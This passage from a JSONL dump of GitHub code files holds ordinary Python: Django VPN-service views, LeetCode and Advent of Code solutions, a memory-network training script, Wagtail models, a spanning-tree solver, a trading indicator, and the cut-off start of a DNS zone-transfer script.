JsonResponse(dict(status='ok'))\n\n\ndef api_locations(request):\n def format_loc(cc, l):\n msg = ' [%s]' % l['message'] if l['message'] else ''\n return {\n 'country_name': l['country_name'] + msg,\n 'country_code': cc,\n 'hostname': l['hostname'],\n 'bandwidth': l['bandwidth'],\n 'servers': l['servers'],\n }\n return JsonResponse(dict(locations=[format_loc(cc, l) for cc, l in 
get_locations()]))\n\n\ndef status(request):\n locations = get_locations()\n\n ctx = {\n 'title': _(\"Status\"),\n 'n_users': VPNUser.objects.filter(expiration__gte=timezone.now()).count(),\n 'n_sess': core.current_active_sessions(),\n 'n_gws': sum(l['servers'] for cc, l in locations),\n 'n_countries': len(set(cc for cc, l in locations)),\n 'total_bw': sum(l['bandwidth'] for cc, l in locations),\n 'locations': locations,\n }\n return render(request, 'lambdainst/status.html', ctx)\n\n\n@user_passes_test(lambda user: user.is_staff)\ndef admin_status(request):\n graph_name = request.GET.get('graph_name')\n graph_period = request.GET.get('period')\n if graph_period not in ('y', 'm'):\n graph_period = 'm'\n if graph_name:\n if graph_name == 'users':\n content = graphs.users_graph(graph_period)\n elif graph_name == 'payments_paid':\n content = graphs.payments_paid_graph(graph_period)\n elif graph_name == 'payments_success':\n content = graphs.payments_success_graph(graph_period)\n else:\n return HttpResponseNotFound()\n return HttpResponse(content=content, content_type='image/svg+xml')\n\n payment_status = ((b, b.get_info()) for b in ACTIVE_BACKENDS.values())\n payment_status = ((b, i) for (b, i) in payment_status if i)\n\n ctx = {\n 'api_status': {k: str(v) for k, v in core_api.info.items()},\n 'payment_backends': sorted(ACTIVE_BACKENDS.values(), key=lambda x: x.backend_id),\n 'payment_status': payment_status,\n }\n ctx.update(site.each_context(request))\n return render(request, 'lambdainst/admin_status.html', ctx)\n\n\n@user_passes_test(lambda user: user.is_staff)\ndef admin_ref(request):\n last_week = datetime.now() - timedelta(days=7)\n last_month = datetime.now() - timedelta(days=30)\n\n top_ref = User.objects.annotate(n_ref=Count('referrals')).order_by('-n_ref')[:10]\n top_ref_week = User.objects.filter(referrals__user__date_joined__gt=last_week) \\\n .annotate(n_ref=Count('referrals')) \\\n .order_by('-n_ref')[:10]\n top_ref_month = User.objects.filter(referrals__user__date_joined__gt=last_month) \\\n .annotate(n_ref=Count('referrals')) \\\n .order_by('-n_ref')[:10]\n\n ctx = {\n 'top_ref': top_ref,\n 'top_ref_week': top_ref_week,\n 'top_ref_month': top_ref_month,\n }\n ctx.update(site.each_context(request))\n return render(request, 'lambdainst/admin_ref.html', ctx)\n\n\n\n\n\n","repo_name":"CCrypto/ccvpn3","sub_path":"lambdainst/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"} +{"seq_id":"40978420741","text":"from collections import defaultdict,deque\nimport functools\nimport heapq\nfrom queue import Queue,LifoQueue,PriorityQueue\nfrom bisect import bisect_right,insort_left,bisect_left\nfrom functools import cache\n\nclass Solution(object):\n def countDaysTogether(self, arriveAlice, leaveAlice, arriveBob, leaveBob):\n \"\"\"\n :type arriveAlice: str\n :type leaveAlice: str\n :type arriveBob: str\n :type leaveBob: str\n :rtype: int\n \"\"\"\n lss = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n def getDay(str1):\n ls= str1.split(\"-\")\n a,b = int(ls[0]),int(ls[1])\n #print(a,b,sum(lss[:a]) +b ,sum(lss[:a]) )\n return sum(lss[:a-1]) +b \n alice =[getDay(arriveAlice) , getDay(leaveAlice)]\n bob =[getDay(arriveBob) , getDay(leaveBob)]\n cnt = 0\n #print(alice,bob)\n for i in range(366):\n if alice[0]<=i<=alice[1] and bob[0]<=i<=bob[1]:\n cnt +=1\n return cnt\n\n\n\n\n\nre =Solution().countDaysTogether(arriveAlice = \"10-01\", leaveAlice = \"10-31\", arriveBob = 
\"11-01\", leaveBob = \"12-31\")\nprint(re)","repo_name":"wherby/code","sub_path":"contest/00000c275d69/d87/q1/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21925581195","text":"\n'''\n\nProgram to Find Smallest Item in a Tuple\n\n'''\n\n\n\n# Tuple Max Item\n\ndef tupleSmallest(smTuple):\n tupSmallest = smTuple[0]\n for i in smTuple:\n if(tupSmallest > i):\n tupSmallest = i\n return tupSmallest\n\nsmTuple = (19, 77, 13, 87, 33, 6, 17, 45, 66) \nprint(\"Tuple Items = \", smTuple)\n\nsmt = tupleSmallest(smTuple)\nprint(\"Smallest Item in smTuple Tuple = \", smt)","repo_name":"naveentrigunayat/Pythontutorial","sub_path":"Python Code/45.A.Tuple Algorithms/24.Program to Find Smallest Item in a Tuple.py","file_name":"24.Program to Find Smallest Item in a Tuple.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34628487498","text":"\nfrom reportlab.platypus.flowables import Image\nfrom properties import *\n# from pixies.utils import *\n\nclass ExternalGraphic( Image, Properties ):\n\t\"\"\" \n\tMap to the fo:external-graphic XSL-FO element.\n\tProperties to be supported are:\n\t\t- \"scaling\" -- § 7.14.10 on page 250\n\t\t- \"scaling-method\" -- § 7.14.11 on page 251\n\t\t- \"src\" -- § 7.28.7 on page 335\n\t\t- \"text-align\" -- § 7.15.9 on page 258\n\t\t- \"width\" -- § 7.14.12 on page 251\n\t\"\"\"\n\n\tdef __init__( self, attrs ):\n\t\t\n\t\t# PIL is required to draw images\n\t\ttry:\n\t\t\timport PIL\n\t\texcept ImportError:\n\t\t\tError(\"\"\"\nPIL (Python Imaging Library) is required to use images in \nyour documents. \nYou should download and install it. 
\nhttp://www.pythonware.com/products/pil/\n\t\t\t\t\"\"\")\n\t\t\n\t\tProperties.__init__(self)\n\t\tself.graphic( attrs )\n\t\t\n\t\tif self.properties['src']:\n\t\t\tself.filename = self.properties['src']\n\t\telse:\n\t\t\tError('No source defined for external-graphic element.')\n\t\t\n\t\tImage.__init__( self, self.filename )\n","repo_name":"BackupTheBerlios/pixies-svn","sub_path":"pixies/elements/graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37481084634","text":"\"\"\"Example running MemN2N on a single bAbI task.\nDownload tasks from facebook.ai/babi \"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom data_utils import load_task, vectorize_data\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom memn2n_kv import MemN2N_KV\nfrom itertools import chain\nfrom six.moves import range\n\nimport tensorflow as tf\nimport numpy as np\nfrom memn2n_kv import zero_nil_slot, add_gradient_noise\n\ntf.flags.DEFINE_float(\"epsilon\", 0.1, \"Epsilon value for Adam Optimizer.\")\ntf.flags.DEFINE_float(\"l2_lambda\", 0.2, \"Lambda for l2 loss.\")\ntf.flags.DEFINE_float(\"learning_rate\", 0.001, \"Learning rate\")\ntf.flags.DEFINE_float(\"max_grad_norm\", 20.0, \"Clip gradients to this norm.\")\ntf.flags.DEFINE_float(\"keep_prob\", 1.0, \"Keep probability for dropout\")\ntf.flags.DEFINE_integer(\"evaluation_interval\", 50, \"Evaluate and print results every x epochs\")\ntf.flags.DEFINE_integer(\"batch_size\", 32, \"Batch size for training.\")\ntf.flags.DEFINE_integer(\"feature_size\", 40, \"Feature size\")\ntf.flags.DEFINE_integer(\"hops\", 3, \"Number of hops in the Memory Network.\")\ntf.flags.DEFINE_integer(\"epochs\", 100, \"Number of epochs to train for.\")\ntf.flags.DEFINE_integer(\"embedding_size\", 30, \"Embedding size for embedding matrices.\")\ntf.flags.DEFINE_integer(\"memory_size\", 20, \"Maximum size of memory.\")\ntf.flags.DEFINE_integer(\"task_id\", 1, \"bAbI task id, 1 <= id <= 20\")\ntf.flags.DEFINE_string(\"data_dir\", \"data/tasks_1-20_v1-2/en/\", \"Directory containing bAbI tasks\")\ntf.flags.DEFINE_string(\"reader\", \"bow\", \"Reader for the model (bow, simple_gru)\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\ntf.flags.DEFINE_string(\"output_file\", \"single_scores.csv\", \"Name of output file for final bAbI accuracy scores.\")\n\nFLAGS = tf.flags.FLAGS\n\nprint(\"Started Task:\", FLAGS.task_id)\n\n# task data\ntrain, test = load_task(FLAGS.data_dir, FLAGS.task_id)\ndata = train + test\n\nvocab = sorted(reduce(lambda x, y: x | y, (set(list(chain.from_iterable(s)) + q + a) for s, q, a in data)))\nword_idx = dict((c, i + 1) for i, c in enumerate(vocab))\n\nmax_story_size = max(map(len, (s for s, _, _ in data)))\nmean_story_size = int(np.mean(map(len, (s for s, _, _ in data))))\nsentence_size = max(map(len, chain.from_iterable(s for s, _, _ in data)))\nquery_size = max(map(len, (q for _, q, _ in data)))\nmemory_size = min(FLAGS.memory_size, max_story_size)\nvocab_size = len(word_idx) + 1 # +1 for nil word\nsentence_size = max(query_size, sentence_size) # for the position\n\nprint(\"Longest sentence length\", sentence_size)\nprint(\"Longest story length\", max_story_size)\nprint(\"Average story length\", 
mean_story_size)\n\n# train/validation/test sets\nS, Q, A = vectorize_data(train, word_idx, sentence_size, memory_size)\ntrainS, valS, trainQ, valQ, trainA, valA = train_test_split(S, Q, A, test_size=.1)\ntestS, testQ, testA = vectorize_data(test, word_idx, sentence_size, memory_size)\n\nprint(\"Training set shape\", trainS.shape)\n\n# params\nn_train = trainS.shape[0]\nn_test = testS.shape[0]\nn_val = valS.shape[0]\n\nprint(\"Training Size\", n_train)\nprint(\"Validation Size\", n_val)\nprint(\"Testing Size\", n_test)\n\ntrain_labels = np.argmax(trainA, axis=1)\ntest_labels = np.argmax(testA, axis=1)\nval_labels = np.argmax(valA, axis=1)\n\nbatch_size = FLAGS.batch_size\nbatches = zip(range(0, n_train-batch_size, batch_size), range(batch_size, n_train, batch_size))\n\nwith tf.Graph().as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n # decay learning rate\n starter_learning_rate = FLAGS.learning_rate\n learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, 20000, 0.96, staircase=True)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, epsilon=FLAGS.epsilon)\n\n with tf.Session() as sess:\n \n model = MemN2N_KV(batch_size=batch_size, vocab_size=vocab_size,\n query_size=sentence_size, story_size=sentence_size, memory_key_size=memory_size,\n feature_size=FLAGS.feature_size, memory_value_size=memory_size,\n embedding_size=FLAGS.embedding_size, hops=FLAGS.hops, reader=FLAGS.reader,\n l2_lambda=FLAGS.l2_lambda)\n grads_and_vars = optimizer.compute_gradients(model.loss_op)\n\n grads_and_vars = [(tf.clip_by_norm(g, FLAGS.max_grad_norm), v)\n for g, v in grads_and_vars if g is not None]\n grads_and_vars = [(add_gradient_noise(g), v) for g, v in grads_and_vars]\n nil_grads_and_vars = []\n for g, v in grads_and_vars:\n if v.name in model._nil_vars:\n nil_grads_and_vars.append((zero_nil_slot(g), v))\n else:\n nil_grads_and_vars.append((g, v))\n\n train_op = optimizer.apply_gradients(nil_grads_and_vars, name=\"train_op\", global_step=global_step)\n sess.run(tf.global_variables_initializer())\n\n def train_step(s, q, a):\n feed_dict = {\n model._memory_value: s,\n model._query: q,\n model._memory_key: s,\n model._labels: a,\n model.keep_prob: FLAGS.keep_prob\n }\n _, step, predict_op = sess.run([train_op, global_step, model.predict_op], feed_dict)\n return predict_op\n\n def test_step(s, q):\n feed_dict = {\n model._query: q,\n model._memory_key: s,\n model._memory_value: s,\n model.keep_prob: 1\n }\n preds = sess.run(model.predict_op, feed_dict)\n return preds\n\n for t in range(1, FLAGS.epochs+1):\n np.random.shuffle(batches)\n train_preds = []\n #for start in range(0, n_train, batch_size):\n for start, end in batches:\n #end = start + batch_size\n s = trainS[start:end]\n q = trainQ[start:end]\n a = trainA[start:end]\n predict_op = train_step(s, q, a)\n train_preds += list(predict_op)\n \n if t % FLAGS.evaluation_interval == 0:\n # test on train dataset\n train_preds = test_step(trainS, trainQ)\n train_acc = metrics.accuracy_score(train_labels, train_preds)\n print('-----------------------')\n print('Epoch', t)\n print('Training Accuracy: {0:.2f}'.format(train_acc))\n print('-----------------------')\n\n val_preds = test_step(valS, valQ)\n val_acc = metrics.accuracy_score(np.array(val_preds), val_labels)\n print (val_preds)\n print('-----------------------')\n print('Epoch', t)\n 
print('Validation Accuracy:', val_acc)\n print('-----------------------')\n # test on train dataset\n train_preds = test_step(trainS, trainQ)\n train_acc = metrics.accuracy_score(train_labels, train_preds)\n train_acc = '{0:.2f}'.format(train_acc)\n # eval dataset\n val_preds = test_step(valS, valQ)\n val_acc = metrics.accuracy_score(val_labels, val_preds)\n val_acc = '{0:.2f}'.format(val_acc)\n # testing dataset\n test_preds = test_step(testS, testQ)\n test_acc = metrics.accuracy_score(test_labels, test_preds)\n test_acc = '{0:.2f}'.format(test_acc)\n print(\"Testing Accuracy: {}\".format(test_acc))\n print('Writing final results to {}'.format(FLAGS.output_file))\n with open(FLAGS.output_file, 'a') as f:\n f.write('{}, {}, {}, {}\\n'.format(FLAGS.task_id, test_acc, train_acc, val_acc))\n","repo_name":"siyuanzhao/key-value-memory-networks","sub_path":"single.py","file_name":"single.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"7"} +{"seq_id":"32634896306","text":"from django.db import models\n\nfrom modelcluster.fields import ParentalKey\n\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n MultiFieldPanel,\n InlinePanel,\n PageChooserPanel,\n)\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom news.models import NewsIndexPage\n\nclass HomePageCarousel(Orderable):\n page = ParentalKey(\"home.HomePage\", related_name=\"carousel_images\")\n carousel_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n carousel_header = models.CharField(max_length=150, blank=True, null=True)\n carousel_text = models.CharField(max_length=300, blank=True, null=True)\n \n panels = [\n MultiFieldPanel([\n ImageChooserPanel(\"carousel_image\"),\n FieldPanel(\"carousel_header\"),\n FieldPanel(\"carousel_text\"), \n ], heading='Carousel')\n]\n \n\nclass HomePage(Page):\n subpage_types = [\n 'news.NewsIndexPage',\n 'about.AboutPage',\n 'services.ServicesPage',\n 'gallery.GalleryPage',\n 'testimonials.TestimonialsPage',\n 'contact.ContactPage'\n ]\n max_count = 1 \n\n video_url = models.URLField(blank=False, null=True)\n logo = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n header = models.CharField(max_length=150, blank=True, null=True)\n subheader = models.CharField(max_length=150, blank=True, null=True)\n content = models.CharField(max_length=550, blank=True, null=True)\n content_panels = Page.content_panels + [\n MultiFieldPanel(\n [InlinePanel(\"carousel_images\", max_num=5,\n min_num=1, label=\"Image\"), ],\n heading=\"Carousel Images\",\n ),\n MultiFieldPanel([\n FieldPanel(\"header\"),\n FieldPanel(\"subheader\"), \n ImageChooserPanel(\"logo\"),\n FieldPanel(\"content\"),\n FieldPanel(\"video_url\"), \n ], heading='Hero Config') \n ]\n\n def get_carousel_images(self):\n carousel_list = []\n for image in self.carousel_images.all():\n if image.carousel_image != None:\n carousel_list.append(image)\n return carousel_list\n\n def get_context(self, request, *args, **kwargs):\n context = super().get_context(request, *args, **kwargs)\n try:\n newspage = self.get_children().exact_type(NewsIndexPage)\n recent_news = newspage.first().get_children().live().order_by('-first_published_at')\n if newspage.live():\n context['recent_news'] = 
recent_news[:3]\n else:\n context['recent_news'] = None\n return context\n except:\n return context\n","repo_name":"codersofcolour-sites/london-jaguar-fc","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34768687547","text":"from graph import *\nfrom graph_helper import *\nfrom constants import *\nfrom input_output import *\nfrom solver_algorithms import *\n\n\"\"\"\nThis file extracts leafy spanning trees from graphs, for part 2 of the MLST project.\n\"\"\"\n\n# Takes in files from default input, solves them using all algorithms, logs their\n# performance onto the console, writes the solutions into a file, and merges the\n# solutions from this run with the solutions from the existing file to generate\n# the best solution thus far\ndef do_everything():\n\tgraphs = input_graphs_from_file(ALL_GRAPHS_INPUT)\n\ttrees = find_leafy_spanning_trees(graphs)\n\toutput_graphs_to_new_file(trees, TEMPORARY_TREES_OUTPUT)\n\tmerge_solutions(ALL_TREES_OUTPUT, TEMPORARY_TREES_OUTPUT, ALL_TREES_OUTPUT)\n\n\n# Takes a list of graphs and returns the leafiest spanning tree we can find\n# by running them through all of our algorithms\ndef find_leafy_spanning_trees(graphs):\n\n\t# Initialize our graph-tree pairs\n\tour_graphs = input_graphs_from_file(OUR_GRAPHS)\n\tour_trees = input_graphs_from_file(OUR_TREES)\n\n\t# Initialize manually-solved graph-tree pairs\n\tmanually_solved_graphs = input_graphs_from_file(MANUALLY_SOLVED_GRAPHS)\n\tmanually_solved_trees = input_graphs_from_file(MANUALLY_SOLVED_TREES)\n\n\tleafy_spanning_trees = []\n\n\tfor i in range(len(graphs)):\n\t\tbest_tree = find_leafy_spanning_tree(graphs[i], i, our_graphs, our_trees, manually_solved_graphs, manually_solved_trees)\n\t\tleafy_spanning_trees.append(best_tree)\n\n\treturn leafy_spanning_trees\n\n\n# Takes a graph and returns the leafiest spanning tree we can find by running\n# it through all of our algorithms\n# For best results, also provide our own graph-tree pairs and manually-solved pairs\ndef find_leafy_spanning_tree(graph, graph_number=0, our_graphs=[], our_trees=[], manually_solved_graphs=[], manually_solved_trees=[]):\n\n\t# Maintain a record of bests so far\n\tbest_tree = None\n\tbest_leaf_count = 0\n\tbest_algorithm = ''\n\n\t# Test for graph generated by us\n\tfor i in range(len(our_graphs)):\n\t\tif are_equivalent_graphs(graph, our_graphs[i]):\n\t\t\tour_trees[i].search()\n\t\t\tbest_tree = our_trees[i]\n\t\t\tbest_leaf_count = our_trees[i].num_leaves\n\t\t\tbest_algorithm = 'our own solution'\n\n\t# Test for line\n\tif is_line(graph):\n\t\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(len(get_leaves(graph))) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: detected line')\n\t\treturn graph\n\n\t# Test for tree\n\tif is_tree(graph):\n\t\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(len(get_leaves(graph))) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: detected tree')\n\t\treturn graph\n\n\t# Test for small input size\n\tif len(get_edges(graph)) < SMALL_NUMBER_OF_EDGES:\n\t\tfor i in range(len(manually_solved_graphs)):\n\t\t\tif are_equivalent_graphs(graph, manually_solved_graphs[i]):\n\t\t\t\tsolved_tree = manually_solved_trees[i]\n\t\t\t\tsolved_tree.search()\n\t\t\t\tif solved_tree.num_leaves > best_leaf_count:\n\t\t\t\t\tbest_tree = solved_tree\n\t\t\t\t\tbest_leaf_count = 
solved_tree.num_leaves\n\t\t\t\t\tbest_algorithm = 'manually solved'\n\n\t# Try all algorithms and record the best one\n\tfor algorithm_name, algorithm in ALGORITHMS:\n\t\ttree = algorithm(graph)\n\t\ttree.search()\n\n\t\tif tree.num_leaves > best_leaf_count:\n\t\t\tbest_tree = tree\n\t\t\tbest_leaf_count = tree.num_leaves\n\t\t\tbest_algorithm = algorithm_name\n\n\t# Log the best solution\n\tprint('Best solution for instance ' + str(graph_number) + ':\\tLeaves: ' + str(best_leaf_count) + '\\t/\\t' + str(len(get_nodes(graph))) + '\\tAlgorithm: ' + best_algorithm)\n\n\treturn best_tree\n\n\n\n\n","repo_name":"jimmyjwu/maximum_leaf_spanning_tree","sub_path":"python/graph_solver.py","file_name":"graph_solver.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"26799167123","text":"import argparse\r\nimport bisect\r\nimport collections\r\nimport functools\r\nimport itertools\r\nimport math\r\nimport operator\r\nfrom collections import Counter, defaultdict, deque\r\nfrom heapq import heappop, heappush\r\nfrom itertools import combinations, permutations, product\r\n\r\nimport parse\r\nfrom rich import print\r\n\r\ndebug = set(\"0\")\r\ndebug_space = False\r\n\r\n\r\ndef dbg(*args, lvl=\"0\", **kwargs):\r\n if lvl in debug:\r\n print(lvl)\r\n print(*args, **kwargs)\r\n if debug_space:\r\n print()\r\n\r\n\r\ndef set_debuger():\r\n global debug, debug_space\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"-d\", \"--debug\", nargs=\"?\", const=\"0\", default=\"0\", help=\"Debug List\"\r\n )\r\n parser.add_argument(\r\n \"-n\", \"--nodebug\", action=\"store_true\", help=\"Remove default debug\"\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--addspace\", action=\"store_true\", help=\"Space between debug\"\r\n )\r\n args = parser.parse_args()\r\n debug.update({x for x in args.debug})\r\n if args.nodebug:\r\n debug.remove(\"0\")\r\n if args.addspace:\r\n debug_space = True\r\n\r\n\r\n# ===== ^^ DEBUGER ^^ =====\r\n\r\nwsen = {\"E\": (1, 0), \"S\": (0, -1), \"W\": (-1, 0), \"N\": (0, 1)}\r\nlrud = {\"R\": (1, 0), \"D\": (0, -1), \"L\": (-1, 0), \"U\": (0, 1)}\r\ndir_4 = [(-1, 0), (0, -1), (1, 0), (0, 1)]\r\ndir_8 = [(-1, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1)]\r\n\r\n\r\ndef prod(factors):\r\n return functools.reduce(operator.mul, factors, 1)\r\n\r\n\r\ndef read_data(file_name):\r\n with open(file_name + \".txt\", \"r\", newline=None) as data:\r\n data = data.read().splitlines()\r\n return data\r\n\r\n\r\ndef load_int_lines(datat):\r\n data = datat[:]\r\n for idx, i in enumerate(data):\r\n data[idx] = [x for x in i]\r\n return data\r\n\r\n\r\ndef load_int_commas(datat):\r\n return list(map(int, datat[0].split(\",\")))\r\n\r\n\r\ndef parser(data):\r\n pattern = \"{test} foo {test1:d}\"\r\n match = parse.search(pattern, data)\r\n match.named\r\n\r\n\r\n# ===== ^^ PART OF TEMPLATE ^^ =====\r\ndef sum_list(x, y):\r\n for i in range(len(x)):\r\n x[i] += y[i]\r\n\r\n\r\ndef part_test():\r\n data = read_data(\"test\")\r\n assert part_1(data) == 13\r\n assert part_2(data) == 1\r\n data = read_data(\"test_2\")\r\n assert part_2(data) == 36\r\n\r\n\r\ndef part_1(data):\r\n t = [0,0]\r\n h = [0,0]\r\n visited = set()\r\n\r\n def jump(x, y):\r\n ...\r\n # if abs(x[0]-y[0]) + abs(x[1]-y[1]) >= 3:\r\n\r\n if tuple(x) == tuple(y):\r\n return \r\n if any((x[0]+xx, x[1]+yy) == tuple(y) for xx, yy in dir_8):\r\n return\r\n\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_4:\r\n 
if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n\r\n\r\n for dir_num in data:\r\n dir, num = dir_num.split(\" \")\r\n for _ in range(int(num)):\r\n sum_list(h, lrud[dir])\r\n jump(t, h)\r\n\r\n visited.add(tuple(t))\r\n\r\n return len(visited)\r\n\r\n\r\n \r\n\r\n\r\ndef part_2(data):\r\n\r\n # grid = [[0 for _ in range(7)] for _ in range(7)]\r\n t = [[0,0] for _ in range(10)]\r\n visited = set()\r\n\r\n def jump(x, y):\r\n ...\r\n if abs(x[0]-y[0]) + abs(x[1]-y[1]) > 4:\r\n raise\r\n\r\n\r\n if tuple(x) == tuple(y):\r\n return \r\n if any((x[0]+xx, x[1]+yy) == tuple(y) for xx, yy in dir_8):\r\n return\r\n\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_4:\r\n if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n for xx, yy in dir_8:\r\n for xx4, yy4 in dir_8:\r\n if (x[0]+xx+xx4, x[1]+yy+yy4) == tuple(y):\r\n x[0] += xx\r\n x[1] += yy\r\n return\r\n\r\n\r\n for dir_num in data:\r\n dir, num = dir_num.split(\" \")\r\n for _ in range(int(num)):\r\n sum_list(t[0], lrud[dir])\r\n for r in range(9):\r\n jump(t[r+1], t[r])\r\n\r\n visited.add(tuple(t[9]))\r\n\r\n return len(visited)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n set_debuger()\r\n\r\n part_test()\r\n data = read_data(\"input\")\r\n print(part_1(data[:]))\r\n print(part_2(data[:]))\r\n","repo_name":"Cvaniak/AdventOfCode","sub_path":"2022/Day09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"29410100100","text":"#\n# @lc app=leetcode id=23 lang=python3\n#\n# [23] Merge k Sorted Lists\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n # 1 . iterate 2 list at a time and merge into one and append it to a new list. \n # 2 . then assign lists = mergedlsit \n # 3. 
continue this process till 1 list left\n\n if not lists or len(lists) == 0:\n return None\n # continuing the process\n while len(lists) > 1:\n mergedList = []\n # iterate over 2 lists at a time\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i+1] if (i+1) < len(lists) else None\n # after merging two lists into one, append it to mergedList\n mergedList.append(self.mergeList(l1, l2))\n # assigning lists = mergedList\n lists = mergedList\n return lists[0]\n\n def mergeList(self, l1, l2):\n dummy = ListNode()\n tail = dummy\n\n while l1 and l2: \n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else: \n tail.next = l2\n l2 = l2.next\n tail = tail.next\n \n if l1: \n tail.next = l1\n if l2: \n tail.next = l2\n\n return dummy.next\n\n\n \n# @lc code=end\n\n","repo_name":"asifulhaque087/leetcode","sub_path":"23.merge-k-sorted-lists.py","file_name":"23.merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"16768189551","text":"import numpy as np\n\ndef ema(array, period):\n\n ema = np.zeros_like(array) \n ema[0] = np.mean(array[0] , dtype=np.float32)\n alpha = 2 / (period + 1)\n\n for i in range(1 , len(array) ):\n ema[i] = np.array( (array[i] * alpha + ema[i-1] * (1-alpha) ) , dtype=np.float32 )\n \n return ema \n\ndef gmma(close, **kwargs):\n\n gmma = np.empty((len(close), len(kwargs.keys()) ))\n for i, (key, value) in enumerate(kwargs.items()):\n gmma[: , i] = ema( close , value )\n\n return gmma \n \n\"\"\" Example\ngmma(close , ema1=3 ,ema2=5 ,ema3=8 ,ema4=10 ,ema5=12 ,ema6=15 ,ema7=30 ,ema8=35 ,ema9=40 ,ema10=45 ,ema11=50 ,ema12=60 )\n\n\"\"\"\n","repo_name":"Aliyansayz/gmma_indicator","sub_path":"gmma.py","file_name":"gmma.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"430528253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 7 22:03:49 2019\r\n\r\n@author: Sophie\r\n\"\"\"\r\nimport numpy\r\n\r\n\r\ndef powerLevel(gridSerial, dim):\r\n arr = numpy.zeros((dim + 1, dim +1))\r\n Max = -45\r\n maxCord = [0, 0, 0]\r\n for xCor in range(1, dim + 1):\r\n for yCor in range(1, dim +1):\r\n rackId = xCor + 10\r\n PowerLevel = (rackId * yCor + gridSerial)* rackId\r\n PowerLevel = PowerLevel - (PowerLevel % 100)\r\n arr[xCor,yCor] = ((PowerLevel/ 100) % 10) - 5\r\n for k in range(1, 30):\r\n for i in range(1, dim - k +1):\r\n for j in range(1, dim -2):\r\n val = arr[i:i+k,j:j+k].sum()\r\n if val > Max:\r\n Max = val\r\n maxCord = [Max, i, j, k]\r\n \r\n return maxCord\r\n\r\nprint(\"Real Deal: \", powerLevel(9995, 300))\r\n#print(\"Desired answer is 119 and 12dim actual answer is: \", powerLevel(42, 300))\r\n","repo_name":"BeyondMeta/AdventOfCode2018","sub_path":"AdventCode2018/advent2018d11.py","file_name":"advent2018d11.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"14777113330","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport logging\nimport os\nimport sys\nimport subprocess\n\nsys.path.append(os.path.join(os.path.dirname(__file__),'..','etc'))\nsys.path.append(os.path.join(os.path.dirname(__file__),'..','lib'))\n\nimport zoneconfig\n\n\nclass Zonetransfer(object):\n\tdef __init__(self):\n\t\tself.archives = os.path.join(os.path.dirname(__file__),'..','archives')\n\t\t# initialize logger\n\t\tLOGFILE = 
